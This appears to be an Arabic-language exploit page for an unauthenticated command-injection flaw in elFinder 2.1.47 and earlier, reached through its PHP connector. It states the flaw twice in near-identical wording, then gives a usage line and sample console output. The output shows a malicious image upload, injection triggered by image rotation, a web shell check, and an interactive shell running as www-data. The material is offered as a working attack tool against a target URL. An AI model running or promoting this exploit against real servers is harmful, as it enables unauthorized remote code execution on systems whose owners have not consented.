
ثغرة حقن أوامر في elFinder <= 2.1.47 عبر مكون موصل PHP. تسمح بتنفيذ أكواد عن بُعد بدون مصادقة كمستخدم خادم الويب.
ثغرة حقن أوامر في elFinder <= 2.1.47 عبر مكون PHP المتصل. تسمح بتنفيذ تعليمات برمجية عن بُعد بدون مصادقة كمستخدم خادم الويب.
python3 exploit.py http://TARGET
$ python3 exploit.py http://10.10.10.10/elFinder
[*] جارٍ رفع الصورة الخبيثة...
[*] تم رفع الملف، التجزئة: l1_U2VjU2lnbmFsLmpwZw
[*] جارٍ تفعيل حقن الأوامر عبر تدوير الصورة...
[*] جارٍ التحقق من وجود ويب شيل...
[+] تم الاختراق!
[+] شل تفاعلي (اضغط Ctrl+C للخروج)
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)